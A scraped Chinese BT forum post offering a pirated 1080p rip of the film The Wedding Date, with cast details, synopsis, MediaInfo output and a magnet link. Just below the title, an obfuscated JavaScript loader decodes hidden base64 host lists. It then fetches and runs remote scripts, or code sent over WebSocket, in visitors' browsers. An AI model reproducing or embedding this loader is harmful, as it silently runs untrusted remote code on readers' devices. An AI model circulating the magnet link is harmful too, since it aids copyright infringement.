结婚纪念日[简繁字幕]The.Wedding.Date.2005.BluRay.1080p.DTS-HD.MA5.1.x265.10bit-迅雷下载 9.00GB

版主小s 6天前 211

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 结婚纪念日 / 大喜之日

◎片 名 The Wedding Date

◎年 代 2005

◎产 地 美国

◎类 别 喜剧 / 爱情

◎语 言 英语

◎上映日期 2005-02-04(美国)

◎IMDb链接 https://www.imdb.com/title/tt0372532/

◎豆瓣评分 6.4/10 (1996人评价)

◎豆瓣链接 https://movie.douban.com/subject/1308985/

◎片 长 90 分钟

◎导 演 克莱尔·基尔纳 Clare Kilner (id:1288535)

◎演 员 黛博拉·梅辛 Debra Messing (id:1022653)

德蒙特·莫罗尼 Dermot Mulroney (id:1040534)

艾米·亚当斯 Amy Adams (id:1022563)

杰克·达文波特 Jack Davenport (id:1031865)

莎拉·帕里什 Sarah Parish (id:1127076)

杰瑞米·席菲德 Jeremy Sheffield (id:1032248)

皮特·艾甘 Peter Egan (id:1028005)

霍兰德·泰勒 Holland Taylor (id:1013862)

斯蒂芬·罗波 Stephen Lobo (id:1212008)

Dave Brown Dave Brown (id:1197579)

Danielle Lewis Danielle Lewis (id:1178543)

David Nobbs David Nobbs (id:1135849)

杰茜卡·班汀吉尔 Jessica Bendinger (id:1041527)

布莱克·尼利 Blake Neely (id:1045567)

Oliver Curtis Oliver Curtis (id:1281634)

Christopher Dusendschon Christopher Dusendschon (id:1180674)

◎标 签 爱情 / 美国 / 喜剧 / 美国电影 / 浪漫 / 2005 / 电影 / Wedding

◎简 介

妹妹艾米(艾米·亚当斯 Amy Adams 饰)结婚的消息本应该让凯特(黛博拉·梅辛 Debra Messing 饰)感到高兴,但得知婚礼的伴郎竟然是曾经抛弃过自己的负心汉时,曾经的那种恨之入骨的感情又卷土重来。难道真的要形单影只的看着大家沉浸在浪漫的气氛中吗?凯特发誓决不让这样惨绝人寰的事情发生!一个念头在凯特的脑海中逐渐清晰起来。

几番周折后,凯特雇佣了临时男友尼克(德蒙特·莫罗尼 Dermot Mulroney 饰),温文尔雅又英俊帅气的尼克很快就赢得了凯特父母以及亲人的热烈欢迎,就连凯特自己也被尼克那不知是真是假的柔情和关怀所感动了,一种奇妙的感情在这对以金钱维系着关系的男女之间产生了。

  1. General

  2. Unique ID : 284347207779387319474778656609508505310 (0xD5EB47BB9D58A39AEACD6B8C074BB6DE)

  3. Complete name : T[email protected]BBQDDQ.COM.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 9.00 GiB

  7. Duration : 1 h 29 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 14.5 Mb/s

  10. Encoded date : UTC 2021-07-19 12:09:45

  11. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  12. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 29 min

  20. Bit rate : 10.2 Mb/s

  21. Width : 1 920 pixels

  22. Height : 1 040 pixels

  23. Display aspect ratio : 1.85:1

  24. Frame rate mode : Constant

  25. Frame rate : 23.976 (24000/1001/53354) FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.213

  30. Stream size : 6.35 GiB (71%)

  31. Title : HEVC, [email protected]@High, 24/1.001 fps @ 10207 kbps

  32. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  33. Encoding settings : cpuid=533541111039 / frame-threads=4 / numa-pools=16 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x1040 / interlace=0 / total-frames=128134 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=18.5 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  34. Language : English

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.709

  39. Transfer characteristics : BT.709

  40. Matrix coefficients : BT.709


  41. Audio #1

  42. ID : 2

  43. Format : DTS XLL

  44. Format/Info : Digital Theater Systems

  45. Commercial name : DTS-HD Master Audio

  46. Codec ID : A_DTS

  47. Duration : 1 h 29 min

  48. Bit rate mode : Variable

  49. Bit rate : 3 986 kb/s

  50. Channel(s) : 6 channels

  51. Channel layout : C L R Ls Rs LFE

  52. Sampling rate : 48.0 kHz

  53. Frame rate : 93.750 FPS (512 SPF)

  54. Bit depth : 24 bits

  55. Compression mode : Lossless

  56. Stream size : 2.48 GiB (28%)

  57. Title : English DTS-HD Master Audio 5.1 @ 3987 kbps

  58. Language : English

  59. Default : Yes

  60. Forced : No


  61. Audio #2

  62. ID : 3

  63. Format : AC-3

  64. Format/Info : Audio Coding 3

  65. Commercial name : Dolby Digital

  66. Codec ID : A_AC3

  67. Duration : 1 h 29 min

  68. Bit rate mode : Constant

  69. Bit rate : 192 kb/s

  70. Channel(s) : 2 channels

  71. Channel layout : L R

  72. Sampling rate : 48.0 kHz

  73. Frame rate : 31.250 FPS (1536 SPF)

  74. Compression mode : Lossy

  75. Stream size : 122 MiB (1%)

  76. Title : English Dolby Digital Audio 2.0 @ 192 kbps Commentary

  77. Language : English

  78. Service kind : Complete Main

  79. Default : No

  80. Forced : No


  81. Text #1

  82. ID : 4

  83. Format : PGS

  84. Codec ID : S_HDMV/PGS

  85. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  86. Duration : 1 h 20 min

  87. Bit rate : 38.0 kb/s

  88. Count of elements : 1619

  89. Stream size : 21.9 MiB (0%)

  90. Title : Eng/SUP

  91. Language : English

  92. Default : No

  93. Forced : No


  94. Text #2

  95. ID : 5

  96. Format : PGS

  97. Codec ID : S_HDMV/PGS

  98. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  99. Duration : 1 h 18 min

  100. Bit rate : 23.5 kb/s

  101. Count of elements : 1419

  102. Stream size : 13.1 MiB (0%)

  103. Title : Chs/SUP 简体

  104. Language : Chinese

  105. Default : Yes

  106. Forced : No


  107. Text #3

  108. ID : 6

  109. Format : PGS

  110. Codec ID : S_HDMV/PGS

  111. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  112. Duration : 1 h 18 min

  113. Bit rate : 24.4 kb/s

  114. Count of elements : 1419

  115. Stream size : 13.6 MiB (0%)

  116. Title : Cht/SUP 繁体

  117. Language : Chinese

  118. Default : No

  119. Forced : No


  120. Menu

  121. 00:00:00.000 : en:第 01 章

  122. 00:10:00.600 : en:第 02 章

  123. 00:20:01.200 : en:第 03 章

  124. 00:30:01.800 : en:第 04 章

  125. 00:40:02.400 : en:第 05 章

  126. 00:50:03.000 : en:第 06 章

  127. 01:00:03.600 : en:第 07 章

  128. 01:10:04.200 : en:第 08 章

  129. 01:20:04.800 : en:第 09 章


TAGS 喜剧 爱情

磁力链:
  • magnet:?xt=urn:btih:0544AB391E84496AAD05AC5AAF718C29684D6505
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回